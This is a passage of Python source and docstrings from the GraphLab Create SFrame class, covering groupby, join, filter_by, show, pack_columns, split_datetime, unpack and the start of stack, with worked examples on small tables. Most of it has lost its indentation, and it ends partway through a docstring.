    [9852 rows x 3 columns]
    Compute the movie with the max rating per user.
    >>> chosen_movies = sf.groupby(key_columns='user_id',
                operations={'best_movies': agg.ARGMAX('rating','movie')})
    Compute the movie with the max rating per user and also the movie with the maximum imdb-ranking per user.
    >>> chosen_movies = sf.groupby(key_columns='user_id',
               operations={('max_rating_movie','max_imdb_ranking_movie'): agg.ARGMAX(('rating','imdb-ranking'),'movie')})
    Compute the count, mean, and standard deviation of ratings per (user,
    time), automatically assigning output column names.
    >>> sf['time'] = sf.apply(lambda x: (x['user_id'] + x['movie_id']) % 11 + 2000)
    >>> user_rating_stats = sf.groupby(['user_id', 'time'],
    ...                                [agg.COUNT(),
    ...                                 agg.AVG('rating'),
    ...                                 agg.STDV('rating')])
    >>> user_rating_stats
    +------+---------+-------+---------------+----------------+
    | time | user_id | Count | Avg of rating | Stdv of rating |
    +------+---------+-------+---------------+----------------+
    | 2006 |  61285  |   1   |      4.0      |      0.0       |
    | 2000 |  36078  |   1   |      4.0      |      0.0       |
    | 2003 |  47158  |   1   |      3.0      |      0.0       |
    | 2007 |  34446  |   1   |      3.0      |      0.0       |
    | 2010 |  47990  |   1   |      3.0      |      0.0       |
    | 2003 |  42120  |   1   |      5.0      |      0.0       |
    | 2007 |  44940  |   1   |      4.0      |      0.0       |
    | 2008 |  58240  |   1   |      4.0      |      0.0       |
    | 2002 |   102   |   1   |      1.0      |      0.0       |
    | 2009 |  52708  |   1   |      3.0      |      0.0       |
    | ...  |   ...   |  ...  |      ...      |      ...       |
    +------+---------+-------+---------------+----------------+
    [10000 rows x 5 columns]
    The groupby function can take a variable length list of aggregation
    specifiers so if we want the count and the 0.25 and 0.75 quantiles of
    ratings:
    >>> user_rating_stats = sf.groupby(['user_id', 'time'], agg.COUNT(),
    ...                                {'rating_quantiles': agg.QUANTILE('rating',[0.25, 0.75])})
    >>> user_rating_stats
    +------+---------+-------+------------------------+
    | time | user_id | Count |    rating_quantiles    |
    +------+---------+-------+------------------------+
    | 2006 |  61285  |   1   | array('d', [4.0, 4.0]) |
    | 2000 |  36078  |   1   | array('d', [4.0, 4.0]) |
    | 2003 |  47158  |   1   | array('d', [3.0, 3.0]) |
    | 2007 |  34446  |   1   | array('d', [3.0, 3.0]) |
    | 2010 |  47990  |   1   | array('d', [3.0, 3.0]) |
    | 2003 |  42120  |   1   | array('d', [5.0, 5.0]) |
    | 2007 |  44940  |   1   | array('d', [4.0, 4.0]) |
    | 2008 |  58240  |   1   | array('d', [4.0, 4.0]) |
    | 2002 |   102   |   1   | array('d', [1.0, 1.0]) |
    | 2009 |  52708  |   1   | array('d', [3.0, 3.0]) |
    | ...  |   ...   |  ...  |          ...           |
    +------+---------+-------+------------------------+
    [10000 rows x 4 columns]
    To put all items a user rated into one list value by their star rating:
    >>> user_rating_stats = sf.groupby(["user_id", "rating"],
    ...                                {"rated_movie_ids":agg.CONCAT("movie_id")})
    >>> user_rating_stats
    +--------+---------+----------------------+
    | rating | user_id |   rated_movie_ids    |
    +--------+---------+----------------------+
    |   3    |  31434  | array('d', [1663.0]) |
    |   5    |  25944  | array('d', [1663.0]) |
    |   4    |  38827  | array('d', [1663.0]) |
    |   4    |  51437  | array('d', [1663.0]) |
    |   4    |  42549  | array('d', [1663.0]) |
    |   4    |  49532  | array('d', [1663.0]) |
    |   3    |  26124  | array('d', [1663.0]) |
    |   4    |  46336  | array('d', [1663.0]) |
    |   4    |  52133  | array('d', [1663.0]) |
    |   5    |  62361  | array('d', [1663.0]) |
    |  ...   |   ...   |         ...          |
    +--------+---------+----------------------+
    [9952 rows x 3 columns]
    To put all items and rating of a given user together into a dictionary
    value:
    >>> user_rating_stats = sf.groupby("user_id",
    ...                                {"movie_rating":agg.CONCAT("movie_id", "rating")})
    >>> user_rating_stats
    +---------+--------------+
    | user_id | movie_rating |
    +---------+--------------+
    |  62361  |  {1663: 5}   |
    |  30727  |  {1663: 4}   |
    |  40111  |  {1663: 2}   |
    |  50513  |  {1663: 4}   |
    |  35140  |  {1663: 4}   |
    |  42352  |  {1663: 5}   |
    |  29667  |  {1663: 4}   |
    |  46242  |  {1663: 5}   |
    |  58310  |  {1663: 2}   |
    |  64614  |  {1663: 2}   |
    |   ...   |     ...      |
    +---------+--------------+
    [9852 rows x 2 columns]
    """
    # some basic checking first
    # make sure key_columns is a list
    if isinstance(key_columns, str):
        key_columns = [key_columns]
    # check that every column is a string, and is a valid column name
    my_column_names = self.column_names()
    key_columns_array = []
    for column in key_columns:
        if not isinstance(column, str):
            raise TypeError("Column name must be a string")
        if column not in my_column_names:
            raise KeyError("Column " + column + " does not exist in SFrame")
        if self[column].dtype() == dict:
            raise TypeError("Cannot group on a dictionary column.")
        key_columns_array.append(column)
    group_output_columns = []
    group_columns = []
    group_ops = []
    all_ops = [operations] + list(args)
    for op_entry in all_ops:
        # if it is not a dict, nor a list, it is just a single aggregator
        # element (probably COUNT). wrap it in a list so we can reuse the
        # list processing code
        operation = op_entry
        if not(isinstance(operation, list) or isinstance(operation, dict)):
            operation = [operation]
        if isinstance(operation, dict):
            # now sweep the dict and add to group_columns and group_ops
            for key in operation:
                val = operation[key]
                if type(val) is tuple:
                    (op, column) = val
                    # Vector columns get the vectorized variants of avg/sum.
                    if (op == '__builtin__avg__' and self[column[0]].dtype() is array.array):
                        op = '__builtin__vector__avg__'
                    if (op == '__builtin__sum__' and self[column[0]].dtype() is array.array):
                        op = '__builtin__vector__sum__'
                    if (op == '__builtin__argmax__' or op == '__builtin__argmin__') and ((type(column[0]) is tuple) != (type(key) is tuple)):
                        raise TypeError("Output column(s) and aggregate column(s) for aggregate operation should be either all tuple or all string.")
                    if (op == '__builtin__argmax__' or op == '__builtin__argmin__') and type(column[0]) is tuple:
                        # One (agg column, output name) pair per tuple entry.
                        for (col,output) in zip(column[0],key):
                            group_columns = group_columns + [[col,column[1]]]
                            group_ops = group_ops + [op]
                            group_output_columns = group_output_columns + [output]
                    else:
                        group_columns = group_columns + [column]
                        group_ops = group_ops + [op]
                        group_output_columns = group_output_columns + [key]
                elif val == graphlab.aggregate.COUNT:
                    # The bare COUNT function (not called) — instantiate it.
                    group_output_columns = group_output_columns + [key]
                    val = graphlab.aggregate.COUNT()
                    (op, column) = val
                    group_columns = group_columns + [column]
                    group_ops = group_ops + [op]
                else:
                    raise TypeError("Unexpected type in aggregator definition of output column: " + key)
        elif isinstance(operation, list):
            # we will be using automatically defined column names
            for val in operation:
                if type(val) is tuple:
                    (op, column) = val
                    if (op == '__builtin__avg__' and self[column[0]].dtype() is array.array):
                        op = '__builtin__vector__avg__'
                    if (op == '__builtin__sum__' and self[column[0]].dtype() is array.array):
                        op = '__builtin__vector__sum__'
                    if (op == '__builtin__argmax__' or op == '__builtin__argmin__') and type(column[0]) is tuple:
                        for col in column[0]:
                            group_columns = group_columns + [[col,column[1]]]
                            group_ops = group_ops + [op]
                            group_output_columns = group_output_columns + [""]
                    else:
                        group_columns = group_columns + [column]
                        group_ops = group_ops + [op]
                        group_output_columns = group_output_columns + [""]
                elif val == graphlab.aggregate.COUNT:
                    group_output_columns = group_output_columns + [""]
                    val = graphlab.aggregate.COUNT()
                    (op, column) = val
                    group_columns = group_columns + [column]
                    group_ops = group_ops + [op]
                else:
                    raise TypeError("Unexpected type in aggregator definition.")
    # let's validate group_columns and group_ops are valid
    for (cols, op) in zip(group_columns, group_ops):
        for col in cols:
            if not isinstance(col, str):
                raise TypeError("Column name must be a string")
        if not isinstance(op, str):
            raise TypeError("Operation type not recognized.")
        # BUG FIX: compare the operator string with `!=` instead of
        # `is not`; identity comparison of strings only worked by
        # accident of CPython interning.
        if op != graphlab.aggregate.COUNT()[0]:
            for col in cols:
                if col not in my_column_names:
                    raise KeyError("Column " + col + " does not exist in SFrame")
        _mt._get_metric_tracker().track('sframe.groupby', properties={'operator':op})
    with cython_context():
        return SFrame(_proxy=self.__proxy__.groupby_aggregate(key_columns_array, group_columns,
                                                              group_output_columns, group_ops))
def join(self, right, on=None, how='inner'):
"""
Merge two SFrames. Merges the current (left) SFrame with the given
(right) SFrame using a SQL-style equi-join operation by columns.
Parameters
----------
right : SFrame
The SFrame to join.
on : None | str | list | dict, optional
The column name(s) representing the set of join keys. Each row that
has the same value in this set of columns will be merged together.
* If 'None' is given, join will use all columns that have the same
name as the set of join keys.
* If a str is given, this is interpreted as a join using one column,
where both SFrames have the same column name.
* If a list is given, this is interpreted as a join using one or
more column names, where each column name given exists in both
SFrames.
* If a dict is given, each dict key is taken as a column name in the
left SFrame, and each dict value is taken as the column name in
right SFrame that will be joined together. e.g.
{'left_col_name':'right_col_name'}.
how : {'left', 'right', 'outer', 'inner'}, optional
The type of join to perform. 'inner' is default.
* inner: Equivalent to a SQL inner join. Result consists of the
rows from the two frames whose join key values match exactly,
merged together into one SFrame.
* left: Equivalent to a SQL left outer join. Result is the union
between the result of an inner join and the rest of the rows from
the left SFrame, merged with missing values.
* right: Equivalent to a SQL right outer join. Result is the union
between the result of an inner join and the rest of the rows from
the right SFrame, merged with missing values.
* outer: Equivalent to a SQL full outer join. Result is
the union between the result of a left outer join and a right
outer join.
Returns
-------
out : SFrame
Examples
--------
>>> animals = graphlab.SFrame({'id': [1, 2, 3, 4],
... 'name': ['dog', 'cat', 'sheep', 'cow']})
>>> sounds = graphlab.SFrame({'id': [1, 3, 4, 5],
... 'sound': ['woof', 'baa', 'moo', 'oink']})
>>> animals.join(sounds, how='inner')
+----+-------+-------+
| id | name | sound |
+----+-------+-------+
| 1 | dog | woof |
| 3 | sheep | baa |
| 4 | cow | moo |
+----+-------+-------+
[3 rows x 3 columns]
>>> animals.join(sounds, on='id', how='left')
+----+-------+-------+
| id | name | sound |
+----+-------+-------+
| 1 | dog | woof |
| 3 | sheep | baa |
| 4 | cow | moo |
| 2 | cat | None |
+----+-------+-------+
[4 rows x 3 columns]
>>> animals.join(sounds, on=['id'], how='right')
+----+-------+-------+
| id | name | sound |
+----+-------+-------+
| 1 | dog | woof |
| 3 | sheep | baa |
| 4 | cow | moo |
| 5 | None | oink |
+----+-------+-------+
[4 rows x 3 columns]
>>> animals.join(sounds, on={'id':'id'}, how='outer')
+----+-------+-------+
| id | name | sound |
+----+-------+-------+
| 1 | dog | woof |
| 3 | sheep | baa |
| 4 | cow | moo |
| 5 | None | oink |
| 2 | cat | None |
+----+-------+-------+
[5 rows x 3 columns]
"""
_mt._get_metric_tracker().track('sframe.join', properties={'type':how})
available_join_types = ['left','right','outer','inner']
if not isinstance(right, SFrame):
raise TypeError("Can only join two SFrames")
if how not in available_join_types:
raise ValueError("Invalid join type")
join_keys = dict()
if on is None:
left_names = self.column_names()
right_names = right.column_names()
common_columns = [name for name in left_names if name in right_names]
for name in common_columns:
join_keys[name] = name
elif type(on) is str:
join_keys[on] = on
elif type(on) is list:
for name in on:
if type(name) is not str:
raise TypeError("Join keys must each be a str.")
join_keys[name] = name
elif type(on) is dict:
join_keys = on
else:
raise TypeError("Must pass a str, list, or dict of join keys")
with cython_context():
return SFrame(_proxy=self.__proxy__.join(right.__proxy__, how, join_keys))
def filter_by(self, values, column_name, exclude=False):
"""
Filter an SFrame by values inside an iterable object. Result is an
SFrame that only includes (or excludes) the rows that have a column
with the given ``column_name`` which holds one of the values in the
given ``values`` :class:`~graphlab.SArray`. If ``values`` is not an
SArray, we attempt to convert it to one before filtering.
Parameters
----------
values : SArray | list | numpy.ndarray | pandas.Series | str
The values to use to filter the SFrame. The resulting SFrame will
only include rows that have one of these values in the given
column.
column_name : str
The column of the SFrame to match with the given `values`.
exclude : bool
If True, the result SFrame will contain all rows EXCEPT those that
have one of ``values`` in ``column_name``.
Returns
-------
out : SFrame
The filtered SFrame.
Examples
--------
>>> sf = graphlab.SFrame({'id': [1, 2, 3, 4],
... 'animal_type': ['dog', 'cat', 'cow', 'horse'],
... 'name': ['bob', 'jim', 'jimbob', 'bobjim']})
>>> household_pets = ['cat', 'hamster', 'dog', 'fish', 'bird', 'snake']
>>> sf.filter_by(household_pets, 'animal_type')
+-------------+----+------+
| animal_type | id | name |
+-------------+----+------+
| dog | 1 | bob |
| cat | 2 | jim |
+-------------+----+------+
[2 rows x 3 columns]
>>> sf.filter_by(household_pets, 'animal_type', exclude=True)
+-------------+----+--------+
| animal_type | id | name |
+-------------+----+--------+
| horse | 4 | bobjim |
| cow | 3 | jimbob |
+-------------+----+--------+
[2 rows x 3 columns]
"""
_mt._get_metric_tracker().track('sframe.filter_by')
if type(column_name) is not str:
raise TypeError("Must pass a str as column_name")
if type(values) is not SArray:
# If we were given a single element, try to put in list and convert
# to SArray
if not hasattr(values, '__iter__'):
values = [values]
values = SArray(values)
value_sf = SFrame()
value_sf.add_column(values, column_name)
# Make sure the values list has unique values, or else join will not
# filter.
value_sf = value_sf.groupby(column_name, {})
existing_columns = self.column_names()
if column_name not in existing_columns:
raise KeyError("Column '" + column_name + "' not in SFrame.")
existing_type = self.column_types()[self.column_names().index(column_name)]
given_type = value_sf.column_types()[0]
if given_type != existing_type:
raise TypeError("Type of given values does not match type of column '" +
column_name + "' in SFrame.")
with cython_context():
if exclude:
id_name = "id"
# Make sure this name is unique so we know what to remove in
# the result
while id_name in existing_columns:
id_name += "1"
value_sf = value_sf.add_row_number(id_name)
tmp = SFrame(_proxy=self.__proxy__.join(value_sf.__proxy__,
'left',
{column_name:column_name}))
ret_sf = tmp[tmp[id_name] == None]
del ret_sf[id_name]
return ret_sf
else:
return SFrame(_proxy=self.__proxy__.join(value_sf.__proxy__,
'inner',
{column_name:column_name}))
@_check_canvas_enabled
def show(self, columns=None, view=None, x=None, y=None):
"""
show(columns=None, view=None, x=None, y=None)
Visualize the SFrame with GraphLab Create :mod:`~graphlab.canvas`. This function
starts Canvas if it is not already running. If the SFrame has already been plotted,
this function will update the plot.
Parameters
----------
columns : list of str, optional
The columns of this SFrame to show in the SFrame view. In an
interactive browser target of Canvas, the columns will be selectable
and reorderable through the UI as well. If not specified, the
SFrame view will use all columns of the SFrame.
view : str, optional
The name of the SFrame view to show. Can be one of:
- None: Use the default (depends on which Canvas target is set).
- 'Table': Show a scrollable, tabular view of the data in the
SFrame.
- 'Summary': Show a list of columns with some summary statistics
and plots for each column.
- 'Scatter Plot': Show a scatter plot of two numeric columns.
- 'Heat Map': Show a heat map of two numeric columns.
- 'Bar Chart': Show a bar chart of one numeric and one categorical
column.
- 'Line Chart': Show a line chart of one numeric and one
categorical column.
x : str, optional
The column to use for the X axis in a Scatter Plot, Heat Map, Bar
Chart, or Line Chart view. Must be the name of one of the columns
in this SFrame. For Scatter Plot and Heat Map, the column must be
numeric (int or float). If not set, defaults to the first available
valid column.
y : str, optional
The column to use for the Y axis in a Scatter Plot, Heat Map, Bar
Chart, or Line Chart view. Must be the name of one of the numeric
columns in this SFrame. If not set, defaults to the second
available numeric column.
Returns
-------
view : graphlab.canvas.view.View
An object representing the GraphLab Canvas view.
See Also
--------
canvas
Examples
--------
Suppose 'sf' is an SFrame, we can view it in GraphLab Canvas using:
>>> sf.show()
To choose a column filter (applied to all SFrame views):
>>> sf.show(columns=["Foo", "Bar"]) # use only columns 'Foo' and 'Bar'
>>> sf.show(columns=sf.column_names()[3:7]) # use columns 3-7
To choose a specific view of the SFrame:
>>> sf.show(view="Summary")
>>> sf.show(view="Table")
>>> sf.show(view="Bar Chart", x="col1", y="col2")
>>> sf.show(view="Line Chart", x="col1", y="col2")
>>> sf.show(view="Scatter Plot", x="col1", y="col2")
>>> sf.show(view="Heat Map", x="col1", y="col2")
"""
import graphlab.canvas
import graphlab.canvas.inspect
import graphlab.canvas.views.sframe
graphlab.canvas.inspect.find_vars(self)
return graphlab.canvas.show(graphlab.canvas.views.sframe.SFrameView(self, params={
'view': view,
'columns': columns,
'x': x,
'y': y
}))
def pack_columns(self, columns=None, column_prefix=None, dtype=list,
fill_na=None, remove_prefix=True, new_column_name=None):
"""
Pack two or more columns of the current SFrame into one single
column.The result is a new SFrame with the unaffected columns from the
original SFrame plus the newly created column.
The list of columns that are packed is chosen through either the
``columns`` or ``column_prefix`` parameter. Only one of the parameters
is allowed to be provided. ``columns`` explicitly specifies the list of
columns to pack, while ``column_prefix`` specifies that all columns that
have the given prefix are to be packed.
The type of the resulting column is decided by the ``dtype`` parameter.
Allowed values for ``dtype`` are dict, array.array and list:
- *dict*: pack to a dictionary SArray where column name becomes
dictionary key and column value becomes dictionary value
- *array.array*: pack all values from the packing columns into an array
- *list*: pack all values from the packing columns into a list.
Parameters
----------
columns : list[str], optional
A list of column names to be packed. There needs to have at least
two columns to pack. If omitted and `column_prefix` is not
specified, all columns from current SFrame are packed. This
parameter is mutually exclusive with the `column_prefix` parameter.
column_prefix : str, optional
Pack all columns with the given `column_prefix`.
This parameter is mutually exclusive with the `columns` parameter.
dtype : dict | array.array | list, optional
The resulting packed column type. If not provided, dtype is list.
fill_na : value, optional
Value to fill into packed column if missing value is encountered.
If packing to dictionary, `fill_na` is only applicable to dictionary
values; missing keys are not replaced.
remove_prefix : bool, optional
If True and `column_prefix` is specified, the dictionary key will
be constructed by removing the prefix from the column name.
This option is only applicable when packing to dict type.
new_column_name : str, optional
Packed column name. If not given and `column_prefix` is given,
then the prefix will be used as the new column name, otherwise name
is generated automatically.
Returns
-------
out : SFrame
An SFrame that contains columns that are not packed, plus the newly
packed column.
See Also
--------
unpack
Notes
-----
- There must be at least two columns to pack.
- If packing to dictionary, missing key is always dropped. Missing
values are dropped if fill_na is not provided, otherwise, missing
value is replaced by 'fill_na'. If packing to list or array, missing
values will be kept. If 'fill_na' is provided, the missing value is
replaced with 'fill_na' value.
Examples
--------
Suppose 'sf' is an an SFrame that maintains business category
information:
>>> sf = graphlab.SFrame({'business': range(1, 5),
... 'category.retail': [1, None, 1, None],
... 'category.food': [1, 1, None, None],
... 'category.service': [None, 1, 1, None],
... 'category.shop': [1, 1, None, 1]})
>>> sf
+----------+-----------------+---------------+------------------+---------------+
| business | category.retail | category.food | category.service | category.shop |
+----------+-----------------+---------------+------------------+---------------+
| 1 | 1 | 1 | None | 1 |
| 2 | None | 1 | 1 | 1 |
| 3 | 1 | None | 1 | None |
| 4 | None | 1 | None | 1 |
+----------+-----------------+---------------+------------------+---------------+
[4 rows x 5 columns]
To pack all category columns into a list:
>>> sf.pack_columns(column_prefix='category')
+----------+--------------------+
| business | X2 |
+----------+--------------------+
| 1 | [1, 1, None, 1] |
| 2 | [None, 1, 1, 1] |
| 3 | [1, None, 1, None] |
| 4 | [None, 1, None, 1] |
+----------+--------------------+
[4 rows x 2 columns]
To pack all category columns into a dictionary, with new column name:
>>> sf.pack_columns(column_prefix='category', dtype=dict,
... new_column_name='category')
+----------+--------------------------------+
| business | category |
+----------+--------------------------------+
| 1 | {'food': 1, 'shop': 1, 're ... |
| 2 | {'food': 1, 'shop': 1, 'se ... |
| 3 | {'retail': 1, 'service': 1} |
| 4 | {'food': 1, 'shop': 1} |
+----------+--------------------------------+
[4 rows x 2 columns]
To keep column prefix in the resulting dict key:
>>> sf.pack_columns(column_prefix='category', dtype=dict,
remove_prefix=False)
+----------+--------------------------------+
| business | X2 |
+----------+--------------------------------+
| 1 | {'category.retail': 1, 'ca ... |
| 2 | {'category.food': 1, 'cate ... |
| 3 | {'category.retail': 1, 'ca ... |
| 4 | {'category.food': 1, 'cate ... |
+----------+--------------------------------+
[4 rows x 2 columns]
To explicitly pack a set of columns:
>>> sf.pack_columns(columns = ['business', 'category.retail',
'category.food', 'category.service',
'category.shop'])
+-----------------------+
| X1 |
+-----------------------+
| [1, 1, 1, None, 1] |
| [2, None, 1, 1, 1] |
| [3, 1, None, 1, None] |
| [4, None, 1, None, 1] |
+-----------------------+
[4 rows x 1 columns]
To pack all columns with name starting with 'category' into an array
type, and with missing value replaced with 0:
>>> sf.pack_columns(column_prefix="category", dtype=array.array,
... fill_na=0)
+----------+--------------------------------+
| business | X2 |
+----------+--------------------------------+
| 1 | array('d', [1.0, 1.0, 0.0, ... |
| 2 | array('d', [0.0, 1.0, 1.0, ... |
| 3 | array('d', [1.0, 0.0, 1.0, ... |
| 4 | array('d', [0.0, 1.0, 0.0, ... |
+----------+--------------------------------+
[4 rows x 2 columns]
"""
if columns != None and column_prefix != None:
raise ValueError("'columns' and 'column_prefix' parameter cannot be given at the same time.")
if new_column_name == None and column_prefix != None:
new_column_name = column_prefix
if column_prefix != None:
if type(column_prefix) != str:
raise TypeError("'column_prefix' must be a string")
columns = [name for name in self.column_names() if name.startswith(column_prefix)]
if len(columns) == 0:
raise ValueError("There is no column starts with prefix '" + column_prefix + "'")
elif columns == None:
columns = self.column_names()
else:
if not hasattr(columns, '__iter__'):
raise TypeError("columns must be an iterable type")
column_names = set(self.column_names())
for column in columns:
if (column not in column_names):
raise ValueError("Current SFrame has no column called '" + str(column) + "'.")
# check duplicate names
if len(set(columns)) != len(columns):
raise ValueError("There is duplicate column names in columns parameter")
if (len(columns) <= 1):
raise ValueError("Please provide at least two columns to pack")
if (dtype not in (dict, list, array.array)):
raise ValueError("Resulting dtype has to be one of dict/array.array/list type")
# fill_na value for array needs to be numeric
if dtype == array.array:
if (fill_na != None) and (type(fill_na) not in (int, float)):
raise ValueError("fill_na value for array needs to be numeric type")
# all columns have to be numeric type
for column in columns:
if self[column].dtype() not in (int, float):
raise TypeError("Column '" + column + "' type is not numeric, cannot pack into array type")
# generate dict key names if pack to dictionary
# we try to be smart here
# if all column names are like: a.b, a.c, a.d,...
# we then use "b", "c", "d", etc as the dictionary key during packing
if (dtype == dict) and (column_prefix != None) and (remove_prefix == True):
size_prefix = len(column_prefix)
first_char = set([c[size_prefix:size_prefix+1] for c in columns])
if ((len(first_char) == 1) and first_char.pop() in ['.','-','_']):
dict_keys = [name[size_prefix+1:] for name in columns]
else:
dict_keys = [name[size_prefix:] for name in columns]
else:
dict_keys = columns
rest_columns = [name for name in self.column_names() if name not in columns]
if new_column_name != None:
if type(new_column_name) != str:
raise TypeError("'new_column_name' has to be a string")
if new_column_name in rest_columns:
raise KeyError("Current SFrame already contains a column name " + new_column_name)
else:
new_column_name = ""
_mt._get_metric_tracker().track('sframe.pack_columns')
ret_sa = None
with cython_context():
ret_sa = SArray(_proxy=self.__proxy__.pack_columns(columns, dict_keys, dtype, fill_na))
new_sf = self.select_columns(rest_columns)
new_sf.add_column(ret_sa, new_column_name)
return new_sf
def split_datetime(self, expand_column, column_name_prefix=None, limit=None, tzone=False):
"""
Splits a datetime column of SFrame to multiple columns, with each value in a
separate column. Returns a new SFrame with the expanded column replaced with
a list of new columns. The expanded column must be of datetime type.
For more details regarding name generation and
other, refer to :py:func:`graphlab.SArray.split_datetim()`
Parameters
----------
expand_column : str
Name of the unpacked column.
column_name_prefix : str, optional
If provided, expanded column names would start with the given prefix.
If not provided, the default value is the name of the expanded column.
limit : list[str], optional
Limits the set of datetime elements to expand.
Elements are 'year','month','day','hour','minute',
and 'second'.
tzone : bool, optional
A boolean parameter that determines whether to show the timezone
column or not. Defaults to False.
Returns
-------
out : SFrame
A new SFrame that contains rest of columns from original SFrame with
the given column replaced with a collection of expanded columns.
Examples
---------
>>> sf
Columns:
id int
submission datetime
Rows: 2
Data:
+----+-------------------------------------------------+
| id | submission |
+----+-------------------------------------------------+
| 1 | datetime(2011, 1, 21, 7, 17, 21, tzinfo=GMT(+1))|
| 2 | datetime(2011, 1, 21, 5, 43, 21, tzinfo=GMT(+1))|
+----+-------------------------------------------------+
>>> sf.split_datetime('submission',limit=['hour','minute'])
Columns:
id int
submission.hour int
submission.minute int
Rows: 2
Data:
+----+-----------------+-------------------+
| id | submission.hour | submission.minute |
+----+-----------------+-------------------+
| 1 | 7 | 17 |
| 2 | 5 | 43 |
+----+-----------------+-------------------+
"""
if expand_column not in self.column_names():
raise KeyError("column '" + expand_column + "' does not exist in current SFrame")
if column_name_prefix == None:
column_name_prefix = expand_column
new_sf = self[expand_column].split_datetime(column_name_prefix, limit, tzone)
# construct return SFrame, check if there is conflict
rest_columns = [name for name in self.column_names() if name != expand_column]
new_names = new_sf.column_names()
while set(new_names).intersection(rest_columns):
new_names = [name + ".1" for name in new_names]
new_sf.rename(dict(zip(new_sf.column_names(), new_names)))
_mt._get_metric_tracker().track('sframe.split_datetime')
ret_sf = self.select_columns(rest_columns)
ret_sf.add_columns(new_sf)
return ret_sf
def unpack(self, unpack_column, column_name_prefix=None, column_types=None,
na_value=None, limit=None):
"""
Expand one column of this SFrame to multiple columns with each value in
a separate column. Returns a new SFrame with the unpacked column
replaced with a list of new columns. The column must be of
list/array/dict type.
For more details regarding name generation, missing value handling and
other, refer to the SArray version of
:py:func:`~graphlab.SArray.unpack()`.
Parameters
----------
unpack_column : str
Name of the unpacked column
column_name_prefix : str, optional
If provided, unpacked column names would start with the given
prefix. If not provided, default value is the name of the unpacked
column.
column_types : [type], optional
Column types for the unpacked columns.
If not provided, column types are automatically inferred from first
100 rows. For array type, default column types are float. If
provided, column_types also restricts how many columns to unpack.
na_value : flexible_type, optional
If provided, convert all values that are equal to "na_value" to
missing value (None).
limit : list[str] | list[int], optional
Control unpacking only a subset of list/array/dict value. For
dictionary SArray, `limit` is a list of dictionary keys to restrict.
For list/array SArray, `limit` is a list of integers that are
indexes into the list/array value.
Returns
-------
out : SFrame
A new SFrame that contains rest of columns from original SFrame with
the given column replaced with a collection of unpacked columns.
See Also
--------
pack_columns, SArray.unpack
Examples
---------
>>> sf = graphlab.SFrame({'id': [1,2,3],
... 'wc': [{'a': 1}, {'b': 2}, {'a': 1, 'b': 2}]})
+----+------------------+
| id | wc |
+----+------------------+
| 1 | {'a': 1} |
| 2 | {'b': 2} |
| 3 | {'a': 1, 'b': 2} |
+----+------------------+
[3 rows x 2 columns]
>>> sf.unpack('wc')
+----+------+------+
| id | wc.a | wc.b |
+----+------+------+
| 1 | 1 | None |
| 2 | None | 2 |
| 3 | 1 | 2 |
+----+------+------+
[3 rows x 3 columns]
To not have prefix in the generated column name:
>>> sf.unpack('wc', column_name_prefix="")
+----+------+------+
| id | a | b |
+----+------+------+
| 1 | 1 | None |
| 2 | None | 2 |
| 3 | 1 | 2 |
+----+------+------+
[3 rows x 3 columns]
To limit subset of keys to unpack:
>>> sf.unpack('wc', limit=['b'])
+----+------+
| id | wc.b |
+----+------+
| 1 | None |
| 2 | 2 |
| 3 | 2 |
+----+------+
[3 rows x 3 columns]
To unpack an array column:
>>> sf = graphlab.SFrame({'id': [1,2,3],
... 'friends': [array.array('d', [1.0, 2.0, 3.0]),
... array.array('d', [2.0, 3.0, 4.0]),
... array.array('d', [3.0, 4.0, 5.0])]})
>>> sf
+----+-----------------------------+
| id | friends |
+----+-----------------------------+
| 1 | array('d', [1.0, 2.0, 3.0]) |
| 2 | array('d', [2.0, 3.0, 4.0]) |
| 3 | array('d', [3.0, 4.0, 5.0]) |
+----+-----------------------------+
[3 rows x 2 columns]
>>> sf.unpack('friends')
+----+-----------+-----------+-----------+
| id | friends.0 | friends.1 | friends.2 |
+----+-----------+-----------+-----------+
| 1 | 1.0 | 2.0 | 3.0 |
| 2 | 2.0 | 3.0 | 4.0 |
| 3 | 3.0 | 4.0 | 5.0 |
+----+-----------+-----------+-----------+
[3 rows x 4 columns]
"""
if unpack_column not in self.column_names():
raise KeyError("column '" + unpack_column + "' does not exist in current SFrame")
if column_name_prefix == None:
column_name_prefix = unpack_column
new_sf = self[unpack_column].unpack(column_name_prefix, column_types, na_value, limit)
# construct return SFrame, check if there is conflict
rest_columns = [name for name in self.column_names() if name != unpack_column]
new_names = new_sf.column_names()
while set(new_names).intersection(rest_columns):
new_names = [name + ".1" for name in new_names]
new_sf.rename(dict(zip(new_sf.column_names(), new_names)))
_mt._get_metric_tracker().track('sframe.unpack')
ret_sf = self.select_columns(rest_columns)
ret_sf.add_columns(new_sf)
return ret_sf
def stack(self, column_name, new_column_name=None, drop_na=False):
"""
Convert a "wide" column of an SFrame to one or two "tall" columns by
stacking all values.
The stack works only for columns of dict, list, or array type. If the
column is dict type, two new columns are created as a result of
stacking: one column holds the key and another column holds the value.
The rest of the columns are repeated for each key/value pair.
If the column is array or list type, one new column is created as a
result of stacking. With each row holds one element of the array or list
value, and the rest columns from the same original row repeated.
The new SFrame includes the newly created column and all columns other
than the one that is stacked.
Parameters
--------------
column_name : str
The column to stack. This column must be of dict/list/array type
new_column_name : str | list of str, optional
The new column name(s). If original column is list/array type,
new_column_name must a string. If original column is dict type,
new_column_name must be a list of two strings. If not given, column
names are generated automatically.
drop_na : boolean, optional
If True, missing values and empty list/array/dict are all dropped
from the resulting column(s). If False, missing values are
maintained in stacked column(s).
Returns
-------
out : SFrame
A new SFrame that contains newly stacked column(s) plus columns in
original SFrame other than the stacked column.
See Also
--------
unstack
Examples
---------
Suppose 'sf' is an SFrame that contains a column of dict type:
>>> sf = graphlab.SFrame({'topic':[1,2,3,4],
... 'words': [{'a':3, 'cat':2},
... {'a':1, 'the':2},
... {'the':1, 'dog':3},
... {}]
... })
+-------+----------------------+
| topic | words |
+-------+----------------------+
| 1 | {'a': 3, 'cat': 2} |
| 2 | {'a': 1, 'the': 2} |
| 3 | {'the': 1, 'dog': 3} |
| 4 | {} |
+-------+----------------------+
[4 rows x 2 columns]
Stack would stack all keys in one column and all values in another
column:
>>> sf.stack('words', new_column_name=['word', 'count'])
+-------+------+-------+
| topic | word | count |
+-------+------+-------+
| 1 | a | 3 |
| 1 | cat | 2 |
| 2 | a | 1 |
| 2 | the | 2 |
| 3 | the | 1 |
| 3 | dog | 3 |
| 4 | None | None |
+-------+------+-------+
[7 rows x 3 columns]
Observe that since topic 4 had no words, an empty row is inserted.
To drop that row, set dropna=True in the parameters to stack.
Suppose 'sf' is an SFrame that contains a user and his/her friends,
where 'friends' columns is an array type. Stack on 'friends' column
